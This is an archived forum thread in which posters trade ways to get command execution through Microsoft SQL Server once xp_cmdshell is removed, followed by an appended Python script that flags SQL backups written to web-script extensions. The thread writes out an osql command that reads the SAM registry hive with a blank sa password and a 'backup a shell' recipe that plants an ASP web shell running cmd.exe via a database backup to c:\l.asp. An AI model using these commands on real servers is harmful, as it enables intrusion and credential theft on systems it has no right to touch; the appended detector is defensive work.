Full Version: Mssql Shell
c°h°
Hi, is there a way to execute something per mssql if u drop xp_cmdshell and deny the use of sp_addextendedproc?

If so plz gimme some hints

tia
Phil
search the board there are already some "hints" and tuts for that
c°h°
Do u mean that :

osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'"

and in this key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5

the password of the SA user is stored in plain text


cause i dont get this to work maybe there are some different reg keys 4 different mssql versions ?

THX 4 any kind of ideas
woodpecker.boboo
QUOTE(c°h° @ Oct 4 2004, 08:22 AM)
Hi, is there a way to execute something per mssql if u drop xp_cmdshell and deny the use of sp_addextendedproc?

If so plz gimme some hints

tia
*



backup a shell
or
WebTask a shell


have fun
c°h°
backup a shell / webtask a shell is looking really interesting but i could only find chinese sites about that

Does anyone have an english startpoint 4 that ?

so far i tried :

use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='c:\l.asp';

and then connect to ip\l.asp but i am not groupmember of the model table so i cant do it like that.

tia
B3T4
QUOTE(c°h° @ Oct 6 2004, 08:34 AM)
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='c:\l.asp';

and then connect to ip\l.asp but i am not groupmember of the model table so i cant do it like that.

tia
*



try : use master
create...
c°h°
to use master u need dbo rights :/ the model way may grant these rights to any user.

But i dont get it to work
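
Added example, not part of the thread and not code from any poster: the BACKUP statement quoted above writes a file whose name and extension the caller chooses, so a defender reviewing SQL audit data can flag backup targets that a web server would execute. The extension lists, the (login, batch) record layout and the sample records are assumptions constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Assumed policy lists; tune both to the environment.
SCRIPT_EXTS = {".asp", ".aspx", ".asa", ".cer", ".php", ".jsp", ".cgi"}
BACKUP_EXTS = {".bak", ".trn", ".dif"}

# One BACKUP DATABASE/LOG statement, up to the next BACKUP or end of batch.
BACKUP_RE = re.compile(
    r"\bbackup\s+(?:database|log)\s+(\[[^\]]+\]|\w+)\s+to\b(.*?)"
    r"(?=\bbackup\s+(?:database|log)\b|\Z)", re.I | re.S)
# Each DISK = '...' target; '' is an escaped quote inside a T-SQL string.
DISK_RE = re.compile(r"\bdisk\s*=\s*N?'((?:[^']|'')*)'", re.I)

def classify_backup(batch):
    """Return (database, path, verdict) for every DISK target in a SQL batch."""
    findings = []
    for stmt in BACKUP_RE.finditer(batch):
        db = stmt.group(1).strip("[]")
        for target in DISK_RE.finditer(stmt.group(2)):
            path = target.group(1).replace("''", "'")
            # Windows ignores trailing dots and spaces in file names.
            ext = PureWindowsPath(path.rstrip(" .")).suffix.lower()
            if ext in SCRIPT_EXTS:
                verdict = "alert"      # backup file a web server could execute
            elif ext not in BACKUP_EXTS:
                verdict = "review"     # unusual extension for a backup
            else:
                verdict = "ok"
            findings.append((db, path, verdict))
    return findings

# Constructed audit records (login, SQL batch); not real log data.
SAMPLE = [
    ("svc_backup", r"BACKUP DATABASE [sales] TO DISK = N'D:\backup\sales.bak' WITH INIT"),
    ("webapp", r"use model; backup database model to disk='c:\l.asp';"),
    ("webapp", r"BACKUP LOG sales TO DISK='D:\backup\sales.trn', DISK='C:\inetpub\wwwroot\x.ASPX '"),
    ("dba1", r"BACKUP DATABASE hr TO DISK = 'E:\dump\hr.dat'"),
]

def scan(records):
    """Return (login, database, path, verdict) for every non-ok target."""
    return [(login, db, path, verdict)
            for login, batch in records
            for db, path, verdict in classify_backup(batch)
            if verdict != "ok"]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same extension check can be run against backup history or audit events already collected from the server; the regexes only need the statement text.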